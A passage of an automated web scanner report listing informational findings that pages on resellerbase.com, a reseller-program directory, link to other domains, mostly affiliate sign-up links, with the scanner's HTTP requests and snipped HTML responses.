<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.60. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.proxyonline.info"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.61. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=18 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.62. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.whitelabeldropshipper.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.63. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=39 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.webcams.com/affiliate/?ref=reseller"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.64. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=15 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack="><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.65. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.telebay.com/0815"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.66. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.spacash.com/?account=resellerbase&fee=flat"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.67. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?pr=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 8</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.68. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?pr=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 5</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.69. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?pg_which=3&pr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.whitelabeldropshipper.com" name="link_6"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.whitelabeldropshipper.com" name="link_6"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.70. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9&select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.reseller-products.com" name="link_11"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.reseller-products.com" name="link_11"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.71. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?pr=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 6</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&amp;LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.72. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 49347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.whitelabeldropshipper.com" name="link_6"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.whitelabeldropshipper.com" name="link_6"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
